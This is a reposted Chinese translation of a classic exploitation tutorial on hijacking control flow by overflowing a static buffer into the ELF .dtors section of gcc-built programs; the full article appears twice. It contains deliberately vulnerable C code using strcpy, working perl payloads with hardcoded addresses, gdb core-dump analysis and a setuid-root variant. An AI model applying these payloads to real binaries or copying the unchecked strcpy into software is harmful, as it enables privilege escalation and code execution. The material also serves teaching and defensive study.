通过覆盖.dtors进行缓冲区溢出攻击
2010-03-15 15:07
183 查看
http://www.77169.com/book/yin/jiao9/jiaoc991.htm
作者:Juan M. Bello Rivas
整理:warning3
介绍:
本文简要介绍了一种获取C程序(此程序应当是用gcc编译的)执行流程控制的技术。本文假设读者熟悉普通的缓冲区溢出技术以及ELF文件格式。
鸣谢: 感谢ga和dvorak的有趣讨论。
综述:
gcc为函数提供了几种类型的属性,其中两个是我们特别感兴趣的:构造函数(constructors)和析构函数(destructors)。程序员应当使用类似下面的方式来指定这些属性:
static void start(void) __attribute__ ((constructor));
static void stop(void) __attribute__ ((destructor));
带有"构造函数"属性的函数将在main()函数之前被执行,而声明为"析构函数"属性的函数则将在_after_ main()退出时执行。
在生成的ELF可执行印像将会包含两个不同的节:.ctors和.dtors。它们都有类似下面的布局:
0xffffffff <函数地址> <另一个函数地址> ... 0x00000000
注意:如果你真得想要了解有关这部分的所有知识,我建议你去看
gcc-2.95.2/gcc/collect2.c
我们应当知道的几件事情包括:
* .ctors和.dtors将会被映射到进程地址空间中,缺省是可写的。
* 在对二进制文件正常的strip(1)命令后,这些节不会被去掉。
* 我们并不关心是否程序员已经设置了任何的构造函数和析构函数,因为这两节总会出现而且会被映射到内存空间中。
技术细节:
现在是演示一下我们先前所说的时候了:
[warning3@redhat-6 dtor]$ cat > yopta.c <<EOF
#include <stdio.h>
#include <stdlib.h>
static void start(void) __attribute__ ((constructor));
static void stop(void) __attribute__ ((destructor));
int
main(int argc, char *argv[])
{
printf("start == %p/n", start);
printf("stop == %p/n", stop);
exit(EXIT_SUCCESS);
}
void
start(void)
{
printf("hello world!/n");
}
void
stop(void)
{
printf("goodbye world!/n");
}
EOF
[warning3@redhat-6 dtor]$ gcc -o yopta yopta.c
[warning3@redhat-6 dtor]$ ./yopta
hello world!
start == 0x8048434
stop == 0x8048448
goodbye world!
[warning3@redhat-6 dtor]$ objdump -h yopta
yopta: file format elf32-i386
Sections:
Idx Name Size VMA LMA File off Algn
<...>
16 .ctors 0000000c 080494f8 080494f8 000004f8 2**2
CONTENTS, ALLOC, LOAD, DATA
17 .dtors 0000000c 08049504 08049504 00000504 2**2
CONTENTS, ALLOC, LOAD, DATA
<....>
[warning3@redhat-6 dtor]$ objdump -s -j .dtors yopta
yopta: file format elf32-i386
Contents of section .dtors:
8049504 ffffffff 48840408 00000000 ....H.......
我们可以看到就象前面所说的那样,stop()的地址(0x08048448)被储存在.dtors中。0xffffffff是.dtors的头标记,0x00000000是.dtors的尾标记。
既然我们的目的是对程序本身进行攻击,因此从现在开始就让我们完全忘掉.ctors,因为我们不能用它做任何有用的事。(溢出总是发生在main()开始后)
让我们试一个正常的程序,它没有使用这些函数属性标记。
[warning3@redhat-6 dtor]$ cat > bleh.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
static void bleh(void);
int
main(int argc, char *argv[])
{
static u_char buf[] = "bleh";
if (argc < 2)
exit(EXIT_FAILURE);
strcpy(buf, argv[1]);
exit(EXIT_SUCCESS);
}
void
bleh(void)
{
printf("goffio!/n");
}
EOF
[warning3@redhat-6 dtor]$ gcc -o bleh bleh.c
[warning3@redhat-6 dtor]$ ./bleh
[warning3@redhat-6 dtor]$ objdump -h bleh
bleh: file format elf32-i386
Sections:
Idx Name Size VMA LMA File off Algn
<....>
14 .data 00000014 080494dc 080494dc 000004dc 2**2
CONTENTS, ALLOC, LOAD, DATA
15 .eh_frame 00000004 080494f0 080494f0 000004f0 2**2
CONTENTS, ALLOC, LOAD, DATA
16 .ctors 00000008 080494f4 080494f4 000004f4 2**2
CONTENTS, ALLOC, LOAD, DATA
17 .dtors 00000008 080494fc 080494fc 000004fc 2**2
CONTENTS, ALLOC, LOAD, DATA
<....>
我们看到即使没有任何函数被标记为析构属性,.dtors仍然会出现。现在我们来看一下它的内容:
[warning3@redhat-6 dtor]$ objdump -s -j .dtors bleh
bleh: file format elf32-i386
Contents of section .dtors:
80494fc ffffffff 00000000 ........
我们看到程序的.dtors中没有指定任何析构函数的地址。
可能我们将buf声明为静态的而且将其初始化看起来有些奇怪。我们这么做只是为了将其储存在.data区,它非常靠近.dtors节。[ 译者注:参看前面objdump -h bleh的结果,.data在.dtors更低的内存区 ]
这不是我们将数据写入.dtors的唯一方法,你可以使用任何方法来完成,例如格式串攻击,通过返回libc来直接使用strcpy(),利用malloc块分配错误等等。这里采用这种做法只是为了简化起见。
现在我们的目的是要执行bleh()函数中的代码,正常情况下这是不可能发生的。但我们可以通过在.dtors中增加一个指向bleh()的函数入口来达到目的。我们必须覆盖0x0000000(地址在0x080494fc)。
[warning3@redhat-6 dtor]$ objdump --syms bleh | egrep 'text.*bleh'
08048468 l F .text 00000012 bleh
我们看bleh()函数的地址是0x08048468.现在到了真正进行攻击的时候了:
[warning3@redhat-6 dtor]$ ./bleh `perl -e 'print "A" x 24; print "/x68/x84/x04/x08";'`
goffio!
Segmentation fault (core dumped)
[译者注:我们看一下如何确定"A"的个数:
[warning3@redhat-6 dtor]$ objdump -s -j .dtors -j .data bleh
bleh: file format elf32-i386
Contents of section .data:
80494dc 00000000 00950408 00000000 626c6568 ............bleh
80494ec 00000000 ....
"bleh"的起始地址为 0x80494dc + 0x0c = 0x80494e8
[warning3@redhat-6 dtor]$ objdump -s -j .dtors bleh
bleh: file format elf32-i386
Contents of section .dtors:
80494fc ffffffff 00000000 ........
我们要覆盖的地址为0x80494fc + 0x04 = 0x8049500
因此我们用来填充的'A'的个数就等于:
0x8049500 - 0x80494e8 = 0x18 = 24
]
我们看到bleh()函数象我们预料的那样被执行了。不过最好还是让我们看一下得到的进程映像(core),看看到底发生了些什么变化。
[warning3@redhat-6 dtor]$ gdb -q bleh core
Core was generated by `./bleh AAAAAAAAAAAAAAAAAAAAAAAAh'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x8049508 in _GLOBAL_OFFSET_TABLE_ ()
(gdb) bt
#0 0x8049508 in _GLOBAL_OFFSET_TABLE_ ()
#1 0x80484 in ?? ()
#2 0x8049500 in __DTOR_END__ ()
#3 0x80484d0 in _IO_stdin_used ()
Cannot access memory at address 0x68e58955.
(gdb) maintenance info sections
Exec file:
`/home/warning3/dtor/bleh', file type elf32-i386.
<....>
0x080494dc->0x080494f0 at 0x000004dc: .data ALLOC LOAD DATA HAS_CONTENTS
0x080494f0->0x080494f4 at 0x000004f0: .eh_frame ALLOC LOAD DATA HAS_CONTENTS
0x080494f4->0x080494fc at 0x000004f4: .ctors ALLOC LOAD DATA HAS_CONTENTS
0x080494fc->0x08049504 at 0x000004fc: .dtors ALLOC LOAD DATA HAS_CONTENTS
0x08049504->0x0804952c at 0x00000504: .got ALLOC LOAD DATA HAS_CONTENTS
<....>
现在让我们检查一下什么被覆盖了:
(gdb) x/x 0x080494f0
0x80494f0 <force_to_data>: 0x41414141
这部分是.eh_frame(这一节被gcc用来为支持它们的语言存储异常处理函数指针)
的内容
(gdb) x/x 0x080494f4
0x80494f4 <__CTOR_LIST__>: 0x41414141
(gdb) x/8x 0x080494fc
0x80494fc <__DTOR_LIST__>: 0x41414141 0x08048468 0x08049500 0x40013ed0
0x804950c <_GLOBAL_OFFSET_TABLE_+8>: 0x4000a960 0x400fa530 0x08048336
0x400328cc
我们看到,我们甚至根本不用担心0xffffffff这个头标记被覆盖,只须将bleh()的地址放在正确的位置就可以使我们的代码被执行了。我们也发现最后进程发生了段错误,这显然是由于进程会不断搜索.dtors的结尾标记(0x00000000),在找到之前将依次跳到我们所填充地址(0x8049500)后的每个地址去执行,由于结尾标记被我们覆盖了,导致程序跳到了GOT表中去执行了,所以才会发生错误。
结论:
这里展示了另外一种执行shellcode代码的方法。这种技术有以下的一些优点:
* 如果二进制目标文件攻击者是可读的,那么找到我们想写入的确切目标地址是很容易的,只需要分析ELF映像确定.dtors的位置即可。这将大大提高攻击的可靠性。
* 它比覆盖GOT表的技术更简单。
弱点:
* 要求目标程序必须被GNU工具编译和连接。
* 在某些情况下,知道程序退出也很难找到一个地方来存放shellcode
[译者注:这种方法实际上还有一个问题就是,由于析构函数是在main()函数退出之后才执行的,因此,如果程序在发生溢出后,又执行了setuid(saveduid)这样丢弃root权限的操作,攻击者将不能得到root(或者其他用户)权限。我们将bleh.c稍做修改:
[warning3@redhat-6 dtor]$ cat bleh.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
static void bleh(void);
void vulfun(char *ptr)
{
static u_char buf[] = "bleh";
strcpy(buf, ptr);
}
int
main(int argc, char *argv[])
{
int saved_uid = getuid();
if (argc < 2)
exit(EXIT_FAILURE);
printf("Before overflow: UID = %d, EUID = %d/n", getuid(), geteuid());
vulfun(argv[1]);
/* 我们在调用了问题函数vulfun之后,丢弃了root权限 */
setuid(saved_uid);
printf("After overflow: UID = %d, EUID = %d/n", getuid(), geteuid());
exit(EXIT_SUCCESS);
}
void bleh(void)
{
printf(".dtors has been overwritten! UID = %d, EUID = %d/n", getuid(), geteuid());
}
[warning3@redhat-6 dtor]$ ls -l bleh
-rwsr-xr-x 1 root root 12657 Dec 13 19:05 bleh*
[warning3@redhat-6 dtor]$ ./bleh `perl -e 'print "A" x 24; print "/x74/x85/x04/x08";'`
Before overflow: UID = 507, EUID = 0
After overflow: UID = 507, EUID = 507
.dtors has been overwritten! UID = 507, EUID = 507
Segmentation fault
因此我们看到,由于程序丢弃了root权限,我们最后只能以普通用户身份执行bleh().
参考文献:
[1]. <<Overwriting the .dtors section>>, Juan M. Bello Rivas
作者:Juan M. Bello Rivas
整理:warning3
介绍:
本文简要介绍了一种获取C程序(此程序应当是用gcc编译的)执行流程控制的技术。本文假设读者熟悉普通的缓冲区溢出技术以及ELF文件格式。
鸣谢: 感谢ga和dvorak的有趣讨论。
综述:
gcc为函数提供了几种类型的属性,其中两个是我们特别感兴趣的:构造函数(constructors)和析构函数(destructors)。程序员应当使用类似下面的方式来指定这些属性:
static void start(void) __attribute__ ((constructor));
static void stop(void) __attribute__ ((destructor));
带有"构造函数"属性的函数将在main()函数之前被执行,而声明为"析构函数"属性的函数则将在_after_ main()退出时执行。
在生成的ELF可执行印像将会包含两个不同的节:.ctors和.dtors。它们都有类似下面的布局:
0xffffffff <函数地址> <另一个函数地址> ... 0x00000000
注意:如果你真得想要了解有关这部分的所有知识,我建议你去看
gcc-2.95.2/gcc/collect2.c
我们应当知道的几件事情包括:
* .ctors和.dtors将会被映射到进程地址空间中,缺省是可写的。
* 在对二进制文件正常的strip(1)命令后,这些节不会被去掉。
* 我们并不关心是否程序员已经设置了任何的构造函数和析构函数,因为这两节总会出现而且会被映射到内存空间中。
技术细节:
现在是演示一下我们先前所说的时候了:
[warning3@redhat-6 dtor]$ cat > yopta.c <<EOF
#include <stdio.h>
#include <stdlib.h>
static void start(void) __attribute__ ((constructor));
static void stop(void) __attribute__ ((destructor));
int
main(int argc, char *argv[])
{
printf("start == %p/n", start);
printf("stop == %p/n", stop);
exit(EXIT_SUCCESS);
}
void
start(void)
{
printf("hello world!/n");
}
void
stop(void)
{
printf("goodbye world!/n");
}
EOF
[warning3@redhat-6 dtor]$ gcc -o yopta yopta.c
[warning3@redhat-6 dtor]$ ./yopta
hello world!
start == 0x8048434
stop == 0x8048448
goodbye world!
[warning3@redhat-6 dtor]$ objdump -h yopta
yopta: file format elf32-i386
Sections:
Idx Name Size VMA LMA File off Algn
<...>
16 .ctors 0000000c 080494f8 080494f8 000004f8 2**2
CONTENTS, ALLOC, LOAD, DATA
17 .dtors 0000000c 08049504 08049504 00000504 2**2
CONTENTS, ALLOC, LOAD, DATA
<....>
[warning3@redhat-6 dtor]$ objdump -s -j .dtors yopta
yopta: file format elf32-i386
Contents of section .dtors:
8049504 ffffffff 48840408 00000000 ....H.......
我们可以看到就象前面所说的那样,stop()的地址(0x08048448)被储存在.dtors中。0xffffffff是.dtors的头标记,0x00000000是.dtors的尾标记。
既然我们的目的是对程序本身进行攻击,因此从现在开始就让我们完全忘掉.ctors,因为我们不能用它做任何有用的事。(溢出总是发生在main()开始后)
让我们试一个正常的程序,它没有使用这些函数属性标记。
[warning3@redhat-6 dtor]$ cat > bleh.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
static void bleh(void);
int
main(int argc, char *argv[])
{
static u_char buf[] = "bleh";
if (argc < 2)
exit(EXIT_FAILURE);
strcpy(buf, argv[1]);
exit(EXIT_SUCCESS);
}
void
bleh(void)
{
printf("goffio!/n");
}
EOF
[warning3@redhat-6 dtor]$ gcc -o bleh bleh.c
[warning3@redhat-6 dtor]$ ./bleh
[warning3@redhat-6 dtor]$ objdump -h bleh
bleh: file format elf32-i386
Sections:
Idx Name Size VMA LMA File off Algn
<....>
14 .data 00000014 080494dc 080494dc 000004dc 2**2
CONTENTS, ALLOC, LOAD, DATA
15 .eh_frame 00000004 080494f0 080494f0 000004f0 2**2
CONTENTS, ALLOC, LOAD, DATA
16 .ctors 00000008 080494f4 080494f4 000004f4 2**2
CONTENTS, ALLOC, LOAD, DATA
17 .dtors 00000008 080494fc 080494fc 000004fc 2**2
CONTENTS, ALLOC, LOAD, DATA
<....>
我们看到即使没有任何函数被标记为析构属性,.dtors仍然会出现。现在我们来看一下它的内容:
[warning3@redhat-6 dtor]$ objdump -s -j .dtors bleh
bleh: file format elf32-i386
Contents of section .dtors:
80494fc ffffffff 00000000 ........
我们看到程序的.dtors中没有指定任何析构函数的地址。
可能我们将buf声明为静态的而且将其初始化看起来有些奇怪。我们这么做只是为了将其储存在.data区,它非常靠近.dtors节。[ 译者注:参看前面objdump -h bleh的结果,.data在.dtors更低的内存区 ]
这不是我们将数据写入.dtors的唯一方法,你可以使用任何方法来完成,例如格式串攻击,通过返回libc来直接使用strcpy(),利用malloc块分配错误等等。这里采用这种做法只是为了简化起见。
现在我们的目的是要执行bleh()函数中的代码,正常情况下这是不可能发生的。但我们可以通过在.dtors中增加一个指向bleh()的函数入口来达到目的。我们必须覆盖0x0000000(地址在0x080494fc)。
[warning3@redhat-6 dtor]$ objdump --syms bleh | egrep 'text.*bleh'
08048468 l F .text 00000012 bleh
我们看bleh()函数的地址是0x08048468.现在到了真正进行攻击的时候了:
[warning3@redhat-6 dtor]$ ./bleh `perl -e 'print "A" x 24; print "/x68/x84/x04/x08";'`
goffio!
Segmentation fault (core dumped)
[译者注:我们看一下如何确定"A"的个数:
[warning3@redhat-6 dtor]$ objdump -s -j .dtors -j .data bleh
bleh: file format elf32-i386
Contents of section .data:
80494dc 00000000 00950408 00000000 626c6568 ............bleh
80494ec 00000000 ....
"bleh"的起始地址为 0x80494dc + 0x0c = 0x80494e8
[warning3@redhat-6 dtor]$ objdump -s -j .dtors bleh
bleh: file format elf32-i386
Contents of section .dtors:
80494fc ffffffff 00000000 ........
我们要覆盖的地址为0x80494fc + 0x04 = 0x8049500
因此我们用来填充的'A'的个数就等于:
0x8049500 - 0x80494e8 = 0x18 = 24
]
我们看到bleh()函数象我们预料的那样被执行了。不过最好还是让我们看一下得到的进程映像(core),看看到底发生了些什么变化。
[warning3@redhat-6 dtor]$ gdb -q bleh core
Core was generated by `./bleh AAAAAAAAAAAAAAAAAAAAAAAAh'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x8049508 in _GLOBAL_OFFSET_TABLE_ ()
(gdb) bt
#0 0x8049508 in _GLOBAL_OFFSET_TABLE_ ()
#1 0x80484 in ?? ()
#2 0x8049500 in __DTOR_END__ ()
#3 0x80484d0 in _IO_stdin_used ()
Cannot access memory at address 0x68e58955.
(gdb) maintenance info sections
Exec file:
`/home/warning3/dtor/bleh', file type elf32-i386.
<....>
0x080494dc->0x080494f0 at 0x000004dc: .data ALLOC LOAD DATA HAS_CONTENTS
0x080494f0->0x080494f4 at 0x000004f0: .eh_frame ALLOC LOAD DATA HAS_CONTENTS
0x080494f4->0x080494fc at 0x000004f4: .ctors ALLOC LOAD DATA HAS_CONTENTS
0x080494fc->0x08049504 at 0x000004fc: .dtors ALLOC LOAD DATA HAS_CONTENTS
0x08049504->0x0804952c at 0x00000504: .got ALLOC LOAD DATA HAS_CONTENTS
<....>
现在让我们检查一下什么被覆盖了:
(gdb) x/x 0x080494f0
0x80494f0 <force_to_data>: 0x41414141
这部分是.eh_frame(这一节被gcc用来为支持它们的语言存储异常处理函数指针)
的内容
(gdb) x/x 0x080494f4
0x80494f4 <__CTOR_LIST__>: 0x41414141
(gdb) x/8x 0x080494fc
0x80494fc <__DTOR_LIST__>: 0x41414141 0x08048468 0x08049500 0x40013ed0
0x804950c <_GLOBAL_OFFSET_TABLE_+8>: 0x4000a960 0x400fa530 0x08048336
0x400328cc
我们看到,我们甚至根本不用担心0xffffffff这个头标记被覆盖,只须将bleh()的地址放在正确的位置就可以使我们的代码被执行了。我们也发现最后进程发生了段错误,这显然是由于进程会不断搜索.dtors的结尾标记(0x00000000),在找到之前将依次跳到我们所填充地址(0x8049500)后的每个地址去执行,由于结尾标记被我们覆盖了,导致程序跳到了GOT表中去执行了,所以才会发生错误。
结论:
这里展示了另外一种执行shellcode代码的方法。这种技术有以下的一些优点:
* 如果二进制目标文件攻击者是可读的,那么找到我们想写入的确切目标地址是很容易的,只需要分析ELF映像确定.dtors的位置即可。这将大大提高攻击的可靠性。
* 它比覆盖GOT表的技术更简单。
弱点:
* 要求目标程序必须被GNU工具编译和连接。
* 在某些情况下,知道程序退出也很难找到一个地方来存放shellcode
[译者注:这种方法实际上还有一个问题就是,由于析构函数是在main()函数退出之后才执行的,因此,如果程序在发生溢出后,又执行了setuid(saveduid)这样丢弃root权限的操作,攻击者将不能得到root(或者其他用户)权限。我们将bleh.c稍做修改:
[warning3@redhat-6 dtor]$ cat bleh.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
static void bleh(void);
void vulfun(char *ptr)
{
static u_char buf[] = "bleh";
strcpy(buf, ptr);
}
int
main(int argc, char *argv[])
{
int saved_uid = getuid();
if (argc < 2)
exit(EXIT_FAILURE);
printf("Before overflow: UID = %d, EUID = %d/n", getuid(), geteuid());
vulfun(argv[1]);
/* 我们在调用了问题函数vulfun之后,丢弃了root权限 */
setuid(saved_uid);
printf("After overflow: UID = %d, EUID = %d/n", getuid(), geteuid());
exit(EXIT_SUCCESS);
}
void bleh(void)
{
printf(".dtors has been overwritten! UID = %d, EUID = %d/n", getuid(), geteuid());
}
[warning3@redhat-6 dtor]$ ls -l bleh
-rwsr-xr-x 1 root root 12657 Dec 13 19:05 bleh*
[warning3@redhat-6 dtor]$ ./bleh `perl -e 'print "A" x 24; print "/x74/x85/x04/x08";'`
Before overflow: UID = 507, EUID = 0
After overflow: UID = 507, EUID = 507
.dtors has been overwritten! UID = 507, EUID = 507
Segmentation fault
因此我们看到,由于程序丢弃了root权限,我们最后只能以普通用户身份执行bleh().
参考文献:
[1]. <<Overwriting the .dtors section>>, Juan M. Bello Rivas
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 【原理】通过覆盖__atexit进行缓冲区溢出攻击
- 【分析】通过覆盖__atexit进行缓冲区溢出攻击的补充
- [转]通过覆盖__atexit进行缓冲区溢出攻击
- [转]通过覆盖__atexit进行缓冲区溢出攻击的补充
- MS08-025通过覆盖SSDT表进行执行shellcode
- 问题:LINUX通过网站解压zip覆盖网站进行升级失败,忘记apache授权
- [置顶] 文本输入框校验(通过字段返回信息进行文本渲染)
- 通过shell脚本进行数据库操作
- 通过php程序进行文件下载
- Winform RichTextBox 通过API的方式进行设置
- 十九、继承(二)通过继承 进行扩展
- arcgis总结——地理信息服务的发布以及通过rest服务进行geocode相关操作
- (八) 通过jdbc对对solr进行数据的增量导入
- Accelerated C++:通过示例进行编程实践——练习解答(第9章)
- Android手机通过Wifi与PC机之间进行通信问题 (有代码)
- 给指针赋值或通过指针进行赋值
- Activity通过获得Service实例与其进行通信
- 通过nginx代理拦截请求,进行全局访问限制
- 通过配置Flavors和自定义buildConfigField进行多个服务器地址打包
- Spring通过java注解的方式进行配置annotation